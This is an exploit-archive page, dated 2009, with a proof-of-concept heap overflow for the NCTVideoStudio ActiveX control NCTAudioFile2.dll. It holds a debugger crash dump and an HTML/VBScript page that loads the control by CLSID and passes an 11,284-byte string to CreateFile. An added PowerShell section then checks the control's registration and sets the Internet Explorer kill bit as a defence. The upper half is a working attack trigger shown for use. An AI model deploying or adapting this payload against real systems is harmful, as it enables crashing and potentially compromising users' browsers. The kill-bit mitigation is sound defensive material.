NCTVideoStudio ActiveX DLLs Version 1.6 Remote Heap Overflow PoC
Source: vfocus.net  Author: vfocus  Published: 2009-02-02
<html>
----------------------------------------------------------- <br/>
Author : Mountassif Mouad (Stack)              <br/>
----------------------------------------------------------- <br/>
NCTVideoStudio ActiveX DLLs Version 1.6 Remote Heap Overflow PoC <br/>
----------------------------------------------------------- <br/>
<!--
Report for Clsid: {77829F14-D911-40FF-A2F0-D11DB8D6D0BC}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data       
Registers: In olly                
--------------------------------------------------     
EAX 00000001
ECX 7FFDF000
EDX 00150608
EBX 41414141
ESP 0013EFAC
EBP 0013F00C
ESI 00150000
EDI 41414139
EIP 7C97DF51 ntdll.7C97DF51
Block Disassembly:
--------------------------------------------------
7C97DF40 PUSH 0
7C97DF42 PUSH ESI
7C97DF43 CALL 7C97CDC9
7C97DF48 MOV EBX,[EBP+10]
7C97DF4B LEA EDI,[EBX-8]
7C97DF4E MOV [EBP-2C],EDI
7C97DF51 MOVZX EAX,WORD PTR [EDI]   <--- CRASH
7C97DF54 SHL EAX,3
7C97DF57 MOV [EBP-30],EAX
7C97DF5A PUSH 7C97E11C
7C97DF5F PUSH EDI
7C97DF60 PUSH ESI
7C97DF61 CALL 7C97CC6D
7C97DF66 TEST AL,AL
7C97DF68 JE 7C97E0BF

ArgDump:
--------------------------------------------------
EBP+8 00150000 -> 000000C8
EBP+12 50000061
EBP+16 41414141
EBP+20 00150000 -> 000000C8
EBP+24 41414141
EBP+28 40000060

Stack Dump:
--------------------------------------------------
13EFD4 00 00 15 00 41 41 41 41 60 00 00 40 00 00 F8 00  [........`.......]
13EFE4 F8 EF 13 00 5C F0 13 00 18 EE 01 01 A8 EF 13 00  [....\...........]
13EFF4 00 00 03 00 E0 F0 13 00 18 EE 91 7C F8 E0 97 7C  [................]
13F004 FF FF FF FF 39 41 41 41 00 00 15 00 00 00 F8 00  [................]
13F014 61 00 00 50 BE 6A 01 00 D4 EF 13 00 D8 21 F8 00  [a..P.j..........]
Block Disassembly:
--------------------------------------------------
Disasm: 7C97DF51 MOVZX EAX,WORD PTR [EDI]          
-->
<object classid='clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC' id='target' />
<script language='vbscript'>

'for debugging/custom prolog
targetFile = "C:\Program Files\NCT\VideoStudio\Redist\NCTAudioFile2.dll"
prototype  = "Sub CreateFile ( ByVal fileName As String ,  ByVal FormatType As FormatTypeConstants )"
memberName = "CreateFile"
progid     = "NCTAUDIOFILE2Lib.AudioFile2"
argCount   = 2
arg1=String(11284, "A")
arg2=1
target.CreateFile arg1 ,arg2
</script>
</html>

# [2009-01-26]
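The report above shows why this control is reachable from a web page: neither "safe for scripting" nor "safe for initialization" category key is registered, but the DLL implements IObjectSafety and answers that it is safe for untrusted callers and data, so Internet Explorer instantiates it and lets script call CreateFile. The defender's fix for a control like this is the kill bit. The PowerShell below is an added example, not part of the original advisory or of NCT's software: it reads the control's registration state and, in a second function, sets the kill bit. The CLSID is the one from the report; the registry locations and the two component-category GUIDs are the standard Internet Explorer / COM ones; the function names are my own.

```powershell
# Added example: inspect an ActiveX control's safety registration and kill-bit it.
# CLSID taken from the report above; registry paths are the standard IE/COM locations.
$Clsid = '{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}'

# Component categories IE consults when a control does NOT implement IObjectSafety.
$CatSafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

function Get-ActiveXSafety {
    param([Parameter(Mandatory)][string]$Clsid)

    $clsidKey  = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

    # Compatibility Flags is a DWORD; 0x400 is the kill bit.
    $flags = 0
    if (Test-Path $compatKey) {
        $flags = (Get-ItemProperty -Path $compatKey -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $flags) { $flags = 0 }
    }

    $server = $null
    if (Test-Path "$clsidKey\InprocServer32") {
        $server = (Get-ItemProperty -Path "$clsidKey\InprocServer32").'(default)'
    }

    [pscustomobject]@{
        Clsid              = $Clsid
        Registered         = Test-Path $clsidKey
        ServerPath         = $server
        SafeForScripting   = Test-Path "$clsidKey\Implemented Categories\$CatSafeForScripting"
        SafeForInit        = Test-Path "$clsidKey\Implemented Categories\$CatSafeForInitializing"
        CompatibilityFlags = ('0x{0:X}' -f [int]$flags)
        KillBitSet         = (([int]$flags -band 0x400) -ne 0)
    }
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)

    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    if (-not (Test-Path $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }

    $existing = (Get-ItemProperty -Path $compatKey -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }

    # OR in 0x400 so any other flags already present survive. With the kill bit set,
    # IE refuses to load the control regardless of what IObjectSafety reports.
    Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -Type DWord `
        -Value ([int]$existing -bor 0x400)
}

Get-ActiveXSafety -Clsid $Clsid | Format-List
# Writing under HKLM needs an elevated prompt:
# Set-ActiveXKillBit -Clsid $Clsid
# Get-ActiveXSafety -Clsid $Clsid | Format-List   # KillBitSet should now read True
```

Get-ActiveXSafety is read-only and can be run as a normal user to confirm whether the DLL is registered on a host at all; on a machine matching the report it will show Registered True, both SafeFor* fields False and KillBitSet False. Only Set-ActiveXKillBit changes anything, and it takes effect for new IE instances without a reboot.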
